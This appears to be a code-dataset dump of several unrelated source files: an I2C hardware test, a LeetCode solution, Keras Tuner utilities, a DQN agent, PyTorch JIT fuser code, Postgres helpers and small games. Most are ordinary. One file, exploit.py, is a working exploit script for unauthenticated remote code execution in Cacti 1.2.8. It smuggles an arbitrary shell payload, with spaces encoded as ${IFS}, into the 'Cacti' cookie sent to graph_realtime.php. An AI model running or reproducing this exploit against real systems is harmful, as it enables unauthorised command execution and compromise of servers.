i.register_write(address, register, value, 2) time.sleep(0.1) _i2c_register_read_test(i, address, register, value) def _i2c_raw_write(i: QuietI2C, address:int, data:bytearray): i.raw_write(address, data) if VERBOSE: print(f'RAW\t{hex(address)} -> {str(data)[10:].strip(")")}') def _i2c_raw_read_test(i: QuietI2C, address:int, expected:bytearray): response = i.raw_read(address, len(expected)) if response != expected: message = f'Failure at {hex(address)}. Expected {expected} but read {response}' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'RAW\t{hex(address)} <- {response}') def _i2c_check_error(i: QuietI2C, error_name: str, expectation: int): error = i.error() if error != expectation: message = f'Failure {error_name}. Expected {hex(expectation)} received {hex(error)}' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'{error_name.ljust(32)} Pass') def _i2c_check_lower_limit(i: QuietI2C, command:str, low:int, error_name:str, error_code, delay:int=0): under = low - 1 i.write(f'{command} {under}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'UNDER {error_name}', error_code if under >= 0 else 0x0110) i.write(f'{command} {low}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'LOWER {error_name}', 0x00) def _i2c_check_upper_limit(i: QuietI2C, command:str, high:int, error_name:str, error_code, delay:int=0): i.write(f'{command} {high}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'UPPER {error_name}', 0x00) i.write(f'{command} {high + 1}') if delay > 0: time.sleep(delay) _i2c_check_error(i, f'OVER {error_name}', error_code) def _i2c_check_limit(i: QuietI2C, command:str, low:int, high:int, error_name:str, error_code): _i2c_check_lower_limit(i, command, low, error_name, error_code) _i2c_check_upper_limit(i, command, high, error_name, error_code) def _i2c_check_acknowledge(i, expectation:bool): ack = i.acknowledged() if ack != expectation: if ack: message = f'Failure ACKNOWLEDGED. 
Expected NO_ACKNOWLEDGED received ACKNOWLEDGED' else: message = f'Failure ACKNOWLEDGED. Expected ACKNOWLEDGED received NO_ACKNOWLEDGED' if EXIT_ON_FAIL: raise Exception(message) else: print(message) elif VERBOSE: print(f'{("" if ack else "NO_")}ACKNOWLEDGED'.ljust(32) + ' Pass') def i2c_test_errors(i: QuietI2C) -> bool: # Clear Errors i.error() # Verify the second hook works if i.query_int('SYST:ERR?') != 0: messsage = 'Failure "SYS:ERR?" Command' if EXIT_ON_FAIL: raise Exception(messsage) else: print(messsage) elif VERBOSE: print('IIC:REGI:ERRO? Pass') i.disable() _i2c_check_error(i, 'ERROR_NONE', 0x00) _i2c_check_limit(i, 'IIC:BAUD', 16000, 1000000, 'INVALID_BAUD', 0x0B01) _i2c_check_limit(i, 'IIC:TIME', 1, 255, 'INVALID_TIMEOUT', 0x0B02) _i2c_check_limit(i, 'IIC:ADDR', 0, 127, 'INVALID_ADDRESS', 0x0B03) i.write('IIC:MODE MAS') _i2c_check_error(i, 'ERROR_INVALID_MODE', 0x0B04) _i2c_check_limit(i, 'IIC:REGI:RSIZ', 1, 2, 'INVALID_RSIZE', 0x0B20) _i2c_check_limit(i, 'IIC:REGI:ADDR', 0, 255, 'INVALID_REGISTER_ADDRESS', 0x0B21) i.write('IIC:REGI:WRIT 1') _i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10) i.query('IIC:REGI:READ?') i.com.flushInput() _i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11) i.write('IIC:WRIT #11A') _i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10) i.query('IIC:READ? 2') _i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11) i.reset() i.enable_master_mode() try: i.write('IIC:ADDR 0x50;REGI:ADDR 0xFF;RSIZ 1') i.com.flushInput() _i2c_check_upper_limit(i, 'IIC:REGI:WRIT', 255, 'INVALID_REGISTER_VALUE', 0x0B22, 0.1) i.write('IIC:WRIT #10') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31) i.write('IIC:READ? 0') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32) i.write('IIC:WRIT #296' + '0123456789ABCDEF' * 6) i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31) i.query('IIC:READ? 96') i.com.flushInput() time.sleep(0.1) _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32) i.write('IIC:READ?') i.com.flushInput() _i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SYNTAX', 0x0B33) i.write('IIC:ADDR 0x10;WRIT #13ABC') time.sleep(0.1) _i2c_check_acknowledge(i, False) finally: i.disable() def i2c_test(i: QuietI2C) -> bool: i.reset() i.enable_master_mode() try: _i2c_register_read_test(i, 0x50, 0xFE, 0x5449) _i2c_register_read_test(i, 0x50, 0xFF, 0x1004) _i2c_register_write_test(i, 0x50, 0x0C, 0x05AA) _i2c_register_write_test(i, 0x50, 0x08, 0x1E00) _i2c_register_write_test(i, 0x50, 0x0A, 0x5F80) _i2c_raw_write(i, 0x50, bytearray([0xFF])) _i2c_raw_read_test(i, 0x50, bytearray([0x10, 0x04])) _i2c_raw_write(i, 0x50, bytearray([0x0C, 0x05, 0xA0])) _i2c_raw_write(i, 0x50, bytearray([0x0C])) _i2c_raw_read_test(i, 0x50, bytearray([0x05, 0xA0])) finally: i.disable() if __name__ == "__main__": q2c = QuietI2C(None, log_path='usb_log.txt') i2c_test(q2c) i2c_test_errors(q2c) i2c_test(q2c) print('All I2C Tests Passed')
2.40625
2
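For reference, a minimal, hedged usage sketch of the QuietI2C helper defined in the record above, mirroring its own __main__ block; the module name i2c_test, the None coms argument, the log_path keyword, and the 0x50/0xFE address/register values are all taken from or assumed consistent with the record, not verified against real hardware.

# Hedged sketch: assumes the record's module is importable as i2c_test and that the
# Quiet base class accepts (coms, log_path=...) as in the record's __main__ block.
from i2c_test import QuietI2C

q2c = QuietI2C(None, log_path='usb_log.txt')
q2c.enable_master_mode()
try:
    # 0x50 / 0xFE mirror the register-read test in the record.
    device_id = q2c.register_read(0x50, 0xFE, 2)
    print(f'Device register 0xFE -> {hex(device_id)}')
finally:
    q2c.disable()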
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py
webdevhub42/Lambda
5
11874
<reponame>webdevhub42/Lambda<gh_stars>1-10
# Source : https://leetcode.com/problems/binary-tree-tilt/description/
# Date   : 2017-12-26

# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, x):
#         self.val = x
#         self.left = None
#         self.right = None


class Solution:
    def findTilt(self, root):
        """
        :type root: TreeNode
        :rtype: int
        """
        global ans
        ans = 0
        self.sumOfNode(root)
        return ans

    def sumOfNode(self, root):
        if root is None:
            return 0
        left = self.sumOfNode(root.left)
        right = self.sumOfNode(root.right)
        global ans
        ans += abs(left - right)
        return left + right + root.val
3.53125
4
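A small driver for the tilt solution above, included as a hedged illustration; the TreeNode class simply restates the commented-out definition in the record, and the three-node tree is an invented example (tilt of the root is |2 - 3| = 1, leaves contribute 0, so the total is 1).

# Assumes the Solution class from the record is in scope.
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(1)
root.left = TreeNode(2)
root.right = TreeNode(3)
print(Solution().findTilt(root))  # expected: 1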
kerastuner/engine/tuner_utils.py
krantirk/keras-tuner
1
11875
# Copyright 2019 The Keras Tuner Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for Tuner class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import math from collections import defaultdict import numpy as np import time import random import hashlib import tensorflow as tf from tensorflow import keras from ..abstractions import display class TunerStats(object): """Track tuner statistics.""" def __init__(self): self.num_generated_models = 0 # overall number of instances generated self.num_invalid_models = 0 # how many models didn't work self.num_oversized_models = 0 # num models with params> max_params def summary(self, extended=False): display.subsection('Tuning stats') display.display_settings(self.get_config()) def get_config(self): return { 'num_generated_models': self.num_generated_models, 'num_invalid_models': self.num_invalid_models, 'num_oversized_models': self.num_oversized_models } @classmethod def from_config(cls, config): stats = cls() stats.num_generated_models = config['num_generated_models'] stats.num_invalid_models = config['num_invalid_models'] stats.num_oversized_models = config['num_oversized_models'] return stats def get_max_epochs_and_steps(fit_args, fit_kwargs): if fit_args: x = tf.nest.flatten(fit_args)[0] else: x = tf.nest.flatten(fit_kwargs.get('x'))[0] batch_size = fit_kwargs.get('batch_size', 32) if hasattr(x, '__len__'): max_steps = math.ceil(float(len(x)) / batch_size) else: max_steps = fit_kwargs.get('steps') max_epochs = fit_kwargs.get('epochs', 1) return max_epochs, max_steps class TunerCallback(keras.callbacks.Callback): def __init__(self, tuner, trial, execution): self.tuner = tuner self.trial = trial self.execution = execution def on_epoch_begin(self, epoch, logs=None): self.tuner.on_epoch_begin( self.execution, self.model, epoch, logs=logs) def on_batch_begin(self, batch, logs=None): self.tuner.on_batch_begin(self.execution, self.model, batch, logs) def on_batch_end(self, batch, logs=None): self.tuner.on_batch_end(self.execution, self.model, batch, logs) def on_epoch_end(self, epoch, logs=None): self.tuner.on_epoch_end( self.execution, self.model, epoch, logs=logs) class Display(object): def __init__(self, host): self.host = host self.cpu_usage = [] self.gpu_usage = [] self.batch_history = defaultdict(list) self.epoch_pbar = None def on_execution_begin(self, trial, execution, model): # new model summary if len(trial.executions) == 1: display.section('New model') trial.summary() # execution info if needed if trial.max_executions > 1: display.subsection('Execution %d/%d' % (len(trial.executions), trial.max_executions)) def on_trial_end(self, averaged_metrics, best_metrics, objective, remaining_trials, max_trials): # train summary current = averaged_metrics best = best_metrics rows = [['Name', 'Best model', 'Current model']] for name in best.names: best_value = round(best.get_best_value(name), 4) current_value = round(current.get_best_value(name), 4) row = [name, 
best_value, current_value] if name == objective: if best_value == current_value: row = display.colorize_row(row, 'green') else: row = display.colorize_row(row, 'red') rows.append(row) display.display_table(rows) # Tuning budget exhausted if remaining_trials < 1: display.highlight('Hypertuning complete - results in %s' % self.host.results_dir) # TODO: final summary else: display.highlight('%d/%d trials left' % (remaining_trials, max_trials)) def on_epoch_begin(self, execution, model, epoch, logs=None): # reset counters self.epoch_history = defaultdict(list) self.gpu_usage = [] self.cpu_usage = [] # epoch bar self.epoch_pbar = display.progress_bar( total=execution.max_steps, leave=True, unit='steps') def on_epoch_end(self, execution, model, epoch, logs=None): # compute stats final_epoch_postfix = {} for m, v in logs.items(): final_epoch_postfix[m] = round(v, 4) # epoch bar self.epoch_pbar.set_postfix(final_epoch_postfix) self.epoch_pbar.close() def on_batch_end(self, execution, model, batch, logs=None): logs = logs or {} self.epoch_pbar.update(1) # computing metric statistics for k, v in logs.items(): self.batch_history[k].append(v) avg_metrics = self._avg_metrics(self.batch_history) self.epoch_pbar.set_postfix(avg_metrics) # create bar desc with updated statistics description = '' host_status = self.host.get_status() if len(host_status['gpu']): gpu_usage = [float(gpu['usage']) for gpu in host_status['gpu']] gpu_usage = int(np.average(gpu_usage)) self.gpu_usage.append(gpu_usage) description += '[GPU:%3s%%]' % int(np.average(self.gpu_usage)) self.cpu_usage.append(int(host_status['cpu']['usage'])) description += '[CPU:%3s%%]' % int(np.average(self.cpu_usage)) description += 'Epoch %s/%s' % (execution.epochs_seen + 1, execution.max_epochs) self.epoch_pbar.set_description(description) def _avg_metrics(self, metrics): agg_metrics = {} for metric_name, values in metrics.items(): if metric_name == 'batch' or metric_name == 'size': continue agg_metrics[metric_name] = '%.4f' % np.average(values) return agg_metrics def generate_trial_id(): s = str(time.time()) + str(random.randint(1, 1e7)) return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32] def format_execution_id(i, executions_per_trial): execution_id_length = math.ceil( math.log(executions_per_trial, 10)) execution_id_template = '%0' + str(execution_id_length) + 'd' execution_id = execution_id_template % i return execution_id @contextlib.contextmanager def maybe_distribute(distribution_strategy): if distribution_strategy is None: yield else: with distribution_strategy.scope(): yield
2.09375
2
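A brief, hedged usage sketch of the standalone helpers in the tuner_utils module above (generate_trial_id, format_execution_id, maybe_distribute); the import path follows the record's file layout and the concrete values are illustrative assumptions only.

from kerastuner.engine import tuner_utils  # assumed import path, per the record's repo layout

trial_id = tuner_utils.generate_trial_id()             # 32-character hex string
execution_id = tuner_utils.format_execution_id(2, 10)  # zero-padded index; here '2'

with tuner_utils.maybe_distribute(None):               # no strategy -> plain default scope
    pass  # build/compile a model here; with a tf.distribute strategy it runs inside strategy.scope()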
plotter.py
ZiegHailo/SMUVI
0
11876
<reponame>ZiegHailo/SMUVI
__author__ = 'zieghailo'

import matplotlib.pyplot as plt
# plt.ion()


def show():
    plt.show()
    plt.get_current_fig_manager().full_screen_toggle()


def plot_graph(graph):
    # plt.ion()
    x = [p.x for p in graph.points]
    y = [p.y for p in graph.points]
    plt.plot(x, y, 'b*')
    plt.draw()


def plot_arrows(graph):
    for p in graph.points:
        x = p.x
        y = p.y
        for c in p.connections:
            cx = c.x
            cy = c.y
            # ax.arrow(x, y, cx-x, cy-y)
            plt.plot([x, cx], [y, cy], 'k')
    plt.draw()


def plot_visited(visited):
    x = [p.x for p in visited]
    y = [p.y for p in visited]
    plt.plot(x, y, 'ro', ms=10)
    plt.draw()


def plot_connection(start, end):
    plt.plot([start.x, end.x], [start.y, end.y], 'g', linewidth=4)


def start_gui(graph):
    fig = plt.figure(1)
    ax = fig.add_subplot(111)
    ax.set_title('click to build line segments')
    ax.axis('equal')
    line, = ax.plot([0, 100], [0, 100], 'b.')  # empty line
    pointbuilder = PointBuilder(line, ax, graph)
    fig.waitforbuttonpress(0)


class PointBuilder:
    def __init__(self, points, ax, graph):
        self.points = points
        self.ax = ax
        self.graph = graph
        self.cid = points.figure.canvas.mpl_connect('button_press_event', self)
        self.kid = points.figure.canvas.mpl_connect('key_press_event', self)

    def __call__(self, event):
        print('click', event)
        if event.inaxes != self.points.axes:
            return
        self.graph.add_point(event.xdata, event.ydata)
        x = [p.x for p in self.graph.points]
        y = [p.y for p in self.graph.points]
        plt.cla()
        self.graph.build_graph()
        plot_arrows(self.graph)
        plot_graph(self.graph)
        if event.key != 'x':
            plt.waitforbuttonpress(0)


if __name__ == "__main__":
    # Note: start_gui expects a graph argument; the original calls it without one.
    start_gui()
2.9375
3
fannypack/utils/_deprecation.py
brentyi/hfdsajk
5
11877
import warnings
from typing import Callable, Optional, TypeVar, cast

CallableType = TypeVar("CallableType", bound=Callable)


def deprecation_wrapper(message: str, function_or_class: CallableType) -> CallableType:
    """Creates a wrapper for a deprecated function or class.

    Prints a warning the first time a function or class is called.

    Args:
        message (str): Warning message.
        function_or_class (CallableType): Function or class to wrap.

    Returns:
        CallableType: Wrapped function/class.
    """
    warned = False

    def curried(*args, **kwargs):  # pragma: no cover
        nonlocal warned
        if not warned:
            warnings.warn(message, DeprecationWarning, stacklevel=2)
            warned = True
        return function_or_class(*args, **kwargs)

    return cast(CallableType, curried)


def new_name_wrapper(
    old_name: str, new_name: str, function_or_class: CallableType
) -> CallableType:
    """Creates a wrapper for a renamed function or class.

    Prints a warning the first time a function or class is called with the old name.

    Args:
        old_name (str): Old name of function or class. Printed in warning.
        new_name (str): New name of function or class. Printed in warning.
        function_or_class (CallableType): Function or class to wrap.

    Returns:
        CallableType: Wrapped function/class.
    """
    return deprecation_wrapper(
        f"{old_name} is deprecated! Use {new_name} instead.", function_or_class
    )
3.203125
3
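A minimal, hedged usage sketch of the two wrappers above; the add/old_add names are invented for illustration, and the import path is assumed from the record's file location. Whether the warning is actually printed depends on the interpreter's warning filters.

from fannypack.utils._deprecation import deprecation_wrapper, new_name_wrapper  # assumed path

def add(a, b):
    return a + b

old_add = new_name_wrapper("old_add", "add", add)
deprecated_add = deprecation_wrapper("add(a, b) will change in a future release", add)

old_add(1, 2)         # warns "old_add is deprecated! Use add instead." on first call, returns 3
deprecated_add(1, 2)  # warns with the custom message on first call, returns 3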
write/5_json_writer.py
pavlovprojects/python_qa_test_data
0
11878
import json

data = {
    "users": [
        {"Name": "Dominator", "skill": 100, "gold": 99999, "weapons": ['Sword', 'Atomic Laser']},
        {"Name": "Looser", "skill": 1, "gold": -100000, "weapons": [None, None, None]},
    ]
}

with open("example.json", "w") as f:
    s = json.dumps(data, indent=4)
    f.write(s)
2.765625
3
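A short companion sketch showing the file written above being read back; the keys mirror the data dictionary in the record, and the assertions simply confirm the JSON round trip (Python None is serialized as null and comes back as None).

import json

with open("example.json") as f:
    loaded = json.load(f)

assert loaded["users"][0]["Name"] == "Dominator"
assert loaded["users"][1]["weapons"] == [None, None, None]  # null round-trips to None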
src/utils.py
sequoia-tree/cs370
1
11879
<filename>src/utils.py<gh_stars>1-10
from md_utils import *
from py_utils import *
1.234375
1
practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py
zeyuanxy/HackerRank
4
11880
<reponame>zeyuanxy/HackerRank
if __name__ == "__main__":
    data = raw_input().strip(',\n').split(' ')
    count = 0
    total = 0
    for pxl in data:
        pxl = pxl.split(',')
        mean = 0
        for i in pxl:
            mean += int(i)
        mean /= 3
        if mean < 70:
            count += 1
        total += 1
    if float(count) / total > 0.4:
        print 'night'
    else:
        print 'day'
3.40625
3
Mini Projects/RockPaperScissors/RPS.py
Snowystar122/Python-Projects
0
11881
import random as r

# Sets up required variables
running = True
user_wins = 0
comp_wins = 0
answers = ["R", "P", "S"]
win_combos = ["PR", "RS", "SP"]

# Welcome message
print("Welcome to Rock-Paper-Scissors. Please input one of the following:"
      "\n'R' - rock\n'P' - paper\n'S' - scissors\nto get started.")

while running:
    # Running game of rock, paper, scissors
    if user_wins == 3 or comp_wins == 3:
        print(f"Game is over. The score was {user_wins}-{comp_wins}. Thanks for playing.")
        break
    user_guess = input("Guess:").upper()
    if user_guess not in answers:
        print("You didn't enter a valid letter.")
        break
    comp_guess = answers[r.randint(0, 2)]
    guess_join = user_guess + comp_guess
    if guess_join[0] == guess_join[1]:
        print(f"You both guessed {user_guess}!\nThe current score is {user_wins}-{comp_wins}.")
    else:
        # Checks to see if the user's guess beats the computer's guess.
        if guess_join in win_combos:
            user_wins += 1
            print(f"You win! Score is {user_wins}-{comp_wins}.")
        else:
            comp_wins += 1
            print(f"You lose! Score is {user_wins}-{comp_wins}.")
4.09375
4
pybullet-gym/pybulletgym/agents/agents_baselines.py
SmaleZ/vcl_diayn
2
11882
from baselines import deepq def add_opts(parser): pass class BaselinesDQNAgent(object): ''' classdocs ''' def __init__(self, opts): self.metadata = { 'discrete_actions': True, } self.opts = opts self.agent = None def configure(self, observation_space_shape, nb_actions): pass def train(self, env, nb_steps, visualize, verbosity): model = deepq.models.mlp([64]) self.agent = deepq.learn( env, q_func=model, lr=1e-3, max_timesteps=nb_steps, buffer_size=50000, exploration_fraction=0.1, exploration_final_eps=0.02, print_freq=10 if verbosity else None, callback=env.render if visualize else None ) def test(self, env, nb_episodes, visualize): episodes = 0 while episodes < nb_episodes: obs, done = env.reset(), False episode_rew = 0 while not done: if visualize: env.render() obs, rew, done, _ = env.step(self.agent(obs[None])[0]) episode_rew += rew print("Episode reward", episode_rew) episodes += 1 def load_weights(self, load_file): self.agent = deepq.load(load_file) def save_weights(self, save_file, overwrite): self.agent.save(save_file)
2.34375
2
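A hedged usage sketch of the BaselinesDQNAgent wrapper above; it assumes a discrete-action Gym environment such as CartPole-v1, that the legacy OpenAI baselines deepq API used in the record is installed, and that the record's file is importable as agents_baselines. None of these names are confirmed by the record beyond its own imports.

import gym
from agents_baselines import BaselinesDQNAgent  # assumed module name, per the record's path

env = gym.make("CartPole-v1")
agent = BaselinesDQNAgent(opts=None)
agent.configure(env.observation_space.shape, env.action_space.n)
agent.train(env, nb_steps=10000, visualize=False, verbosity=0)
agent.test(env, nb_episodes=3, visualize=False)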
exploit.py
hexcowboy/CVE-2020-8813
0
11883
#!/usr/bin/python3 import requests import click from rich import inspect from rich.console import Console from url_normalize import url_normalize from urllib.parse import quote console = Console() def shell_encode(string): return string.replace(" ", "${IFS}") @click.command() @click.option("-u", "--url", prompt="Target URL", help="The URL of the Cacti installation") @click.option("-p", "--payload", prompt="Payload", help="The payload that you want to execute on the target") def exploit(url, payload): """Cacti v1.2.8 Unauthenticated Remote Code Execution""" # Normalize URL input, URL encode the payload url = url + "/graph_realtime.php?action=init" url = url_normalize(url, default_scheme="http") payload = shell_encode(payload) payload = quote(payload) cookies = {"Cacti": payload} # Check if target is vulnerable try: with console.status("Checking to see if target is vulnerable"): request = requests.get(url) except: console.print(f'Could not connect to the host, please check the URL again: {url}', style="red") exit(1) inspect(request) if request.status_code == 200: with console.status("Realtime graph found, sending payload."): requests.get(url, cookies=cookies) else: click.echo("Realtime graph not found. The target may not be vulnerable.") if __name__ == "__main__": exploit()
2.734375
3
common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py
kmcm0/stacki
123
11884
# @copyright@ # Copyright (c) 2006 - 2019 Teradata # All rights reserved. Stacki(r) v5.x stacki.com # https://github.com/Teradata/stacki/blob/master/LICENSE.txt # @copyright@ # # @rocks@ # Copyright (c) 2000 - 2010 The Regents of the University of California # All rights reserved. Rocks(r) v5.4 www.rocksclusters.org # https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt # @rocks@ import stack.commands class Command(stack.commands.set.firmware.command): """ Associates a firmware implementation with one or more models. <arg type='string' name='models'> One or more models to associate the implementation with. </arg> <param type='string' name='imp'> The name of the implementation to associate with the provided models. </param> <param type='string' name='make'> The make of the models. </param> <example cmd="set firmware model imp m7800 m6036 imp=mellanox_6xxx_7xxx make=mellanox"> Sets the mellanox_6xxx_7xxx implementation as the one to run for the models m7800 and m6036 for make mellanox. </example> """ def run(self, params, args): self.runPlugins(args = (params, args))
2.171875
2
torch/jit/_fuser.py
ljhOfGithub/pytorch
1
11885
<reponame>ljhOfGithub/pytorch import contextlib import torch from typing import List, Tuple @contextlib.contextmanager def optimized_execution(should_optimize): """ A context manager that controls whether the JIT's executor will run optimizations before executing a function. """ stored_flag = torch._C._get_graph_executor_optimize() torch._C._set_graph_executor_optimize(should_optimize) try: yield finally: torch._C._set_graph_executor_optimize(stored_flag) @contextlib.contextmanager def fuser(name): """ A context manager that facilitates switching between backend fusers. Valid names: * ``fuser0`` - enables only legacy fuser * ``fuser1`` - enables only NNC * ``fuser2`` - enables only nvFuser """ old_cpu_fuse = torch._C._jit_can_fuse_on_cpu() old_gpu_fuse = torch._C._jit_can_fuse_on_gpu() old_texpr_fuser_state = torch._C._jit_texpr_fuser_enabled() old_nvfuser_state = torch._C._jit_nvfuser_enabled() if name == 'fuser0': # legacy fuser torch._C._jit_override_can_fuse_on_cpu(True) torch._C._jit_override_can_fuse_on_gpu(True) torch._C._jit_set_texpr_fuser_enabled(False) torch._C._jit_set_nvfuser_enabled(False) elif name == 'fuser1': # NNC old_profiling_executor = torch._C._jit_set_profiling_executor(True) old_profiling_mode = torch._C._jit_set_profiling_mode(True) torch._C._jit_override_can_fuse_on_cpu(True) torch._C._jit_override_can_fuse_on_gpu(True) torch._C._jit_set_texpr_fuser_enabled(True) torch._C._jit_set_nvfuser_enabled(False) elif name == 'fuser2': # nvFuser torch._C._jit_override_can_fuse_on_cpu(False) torch._C._jit_override_can_fuse_on_gpu(False) torch._C._jit_set_texpr_fuser_enabled(False) torch._C._jit_set_nvfuser_enabled(True) else: raise Exception("unrecognized fuser option") try: yield finally: if name == 'fuser1': # NNC torch._C._jit_set_profiling_executor(old_profiling_executor) torch._C._jit_set_profiling_mode(old_profiling_mode) # recover the previous values torch._C._jit_override_can_fuse_on_cpu(old_cpu_fuse) torch._C._jit_override_can_fuse_on_gpu(old_gpu_fuse) torch._C._jit_set_texpr_fuser_enabled(old_texpr_fuser_state) torch._C._jit_set_nvfuser_enabled(old_nvfuser_state) last_executed_optimized_graph = torch._C._last_executed_optimized_graph def _get_differentiable_graph_node(node, diff_node): if node.kind() == 'prim::DifferentiableGraph': diff_node.append(node) else: for block in node.blocks(): for n in block.nodes(): _get_differentiable_graph_node(n, diff_node) def _graph_for(self, *args, **kwargs): return _script_method_graph_for(self, self, *args, **kwargs) def _script_method_graph_for(self, parent, *args, **kwargs): try: dbs = parent.get_debug_state() eps = list(dbs.execution_plans.values()) assert(len(eps) == 1) graph = eps[0].graph.copy() # graph_executor_states for differentiable node fw_states = eps[0].code.differentiable_op_executor_states() diff_nodes: List[torch._C.Node] = [] for n in graph.nodes(): _get_differentiable_graph_node(n, diff_nodes) assert(len(fw_states) == len(diff_nodes)) # swap each differentiable graph with optimized graph in their execution plan for n, state in zip(diff_nodes, fw_states): fw_execution_plans = list(state.execution_plans.values()) # we can only update the subgraph when there's a unique execution # plan. Avoid assert here so we would skip the ones that can't be # updated while try the best effort to update other nodes. 
if len(fw_execution_plans) == 1: n.g_('Subgraph', fw_execution_plans[0].graph) return graph except Exception: # fallback approach, we just ran the graph and return the recorded optimized # graph self(*args, **kwargs) return last_executed_optimized_graph() def set_fusion_strategy(strategy: List[Tuple[str, int]]): """ Sets the type and number of specializations that can occur during fusion. Usage: provide a list of pairs (type, depth) where type is one of "STATIC" or "DYNAMIC" and depth is an integer. Behavior - static vs dynamic: In STATIC fusion, fused ops are compiled to have fixed input shapes. The shape is determined based on some initial profiling runs. In DYNAMIC fusion, fused ops are compiled to have variable input shapes, so that multiple shapes are possible. In both cases, we also recompile on new striding behavior, device, or dtype. Behavior - fallback functions & depth: When an input doesn't match the format required by the specialized compiled op, it will run a fallback function. Fallback functions are recursively be compiled and specialized based on the observed tensor shapes. Since compilation can be slow, the "depth" parameter is provided to limit the number of specializations that can be compiled, before giving up on recompiling and falling back to a completely un-fused, un-specialized implementation. The list of (type, depth) pairs controls the type of specializations and the number of specializations. For example: [("STATIC", 2), ("DYNAMIC", 2)] indicates that the first two specializations will use static fusions, the following two specializations will use dynamic fusion, and any inputs that satisfy none of the 4 options will run an unfused implementation. NB: in the future, if more as more fusion backends are added there may be more granular apis for specific fusers. """ return torch._C._jit_set_fusion_strategy(strategy)
2.265625
2
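A brief, hedged sketch of the two entry points defined in the module above, fuser(...) and set_fusion_strategy(...); the scripted function is an invented example, and the sketch assumes these helpers are re-exported under torch.jit as in upstream PyTorch. Running the function once inside the context does not guarantee fusion; it only selects which fuser is allowed.

import torch

@torch.jit.script
def scaled_tanh(x):
    return torch.tanh(x) * 2.0

x = torch.randn(8, 8)
with torch.jit.fuser("fuser1"):   # enables only NNC, per the context manager above
    scaled_tanh(x)

# Two static specializations, then two dynamic ones, per the docstring above.
torch.jit.set_fusion_strategy([("STATIC", 2), ("DYNAMIC", 2)])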
modlit/db/postgres.py
patdaburu/modlit
0
11886
<reponame>patdaburu/modlit<filename>modlit/db/postgres.py<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Created by pat on 5/8/18 """ .. currentmodule:: modlit.db.postgres .. moduleauthor:: <NAME> <<EMAIL>> This module contains utilities for working directly with PostgreSQL. """ import json from pathlib import Path from urllib.parse import urlparse, ParseResult from addict import Dict import psycopg2 from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT DEFAULT_ADMIN_DB = 'postgres' #: the default administrative database name DEFAULT_PG_PORT = 5432 #: the default PostgreSQL listener port # Load the Postgres phrasebook. # pylint: disable=invalid-name # pylint: disable=no-member sql_phrasebook = Dict( json.loads( ( Path(__file__).resolve().parent / 'postgres.json' ).read_text() )['sql'] ) def connect(url: str, dbname: str = None, autocommit: bool = False): """ Create a connection to a Postgres database. :param url: the Postgres instance URL :param dbname: the target database name (if it differs from the one specified in the URL) :param autocommit: Set the `autocommit` flag on the connection? :return: a psycopg2 connection """ # Parse the URL. (We'll need the pieces to construct an ogr2ogr connection # string.) dbp: ParseResult = urlparse(url) # Create a dictionary to hold the arguments for the connection. (We'll # unpack it later.) cnx_opt = { k: v for k, v in { 'host': dbp.hostname, 'port': int(dbp.port) if dbp.port is not None else DEFAULT_PG_PORT, 'database': dbname if dbname is not None else dbp.path[1:], 'user': dbp.username, 'password': <PASSWORD> }.items() if v is not None } cnx = psycopg2.connect(**cnx_opt) # If the caller requested that the 'autocommit' flag be set... if autocommit: # ...do that now. cnx.autocommit = True return cnx def db_exists(url: str, dbname: str = None, admindb: str = DEFAULT_ADMIN_DB) -> bool: """ Does a given database on a Postgres instance exist? :param url: the Postgres instance URL :param dbname: the name of the database to test :param admindb: the name of an existing (presumably the main) database :return: `True` if the database exists, otherwise `False` """ # Let's see what we got for the database name. _dbname = dbname # If the caller didn't specify a database name... if not _dbname: # ...let's figure it out from the URL. db: ParseResult = urlparse(url) _dbname = db.path[1:] # Now, let's do this! with connect(url=url, dbname=admindb) as cnx: with cnx.cursor() as crs: # Execute the SQL query that counts the databases with a specified # name. crs.execute( sql_phrasebook.select_db_count.format(_dbname) ) # If the count isn't zero (0) the database exists. return crs.fetchone()[0] != 0 def create_db( url: str, dbname: str, admindb: str = DEFAULT_ADMIN_DB): """ Create a database on a Postgres instance. :param url: the Postgres instance URL :param dbname: the name of the database :param admindb: the name of an existing (presumably the main) database """ with connect(url=url, dbname=admindb) as cnx: cnx.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) with cnx.cursor() as crs: crs.execute(sql_phrasebook.create_db.format(dbname)) def touch_db( url: str, dbname: str = None, admindb: str = DEFAULT_ADMIN_DB): """ Create a database if it does not already exist. :param url: the Postgres instance URL :param dbname: the name of the database :param admindb: the name of an existing (presumably the main) database """ # If the database already exists, we don't need to do anything further. 
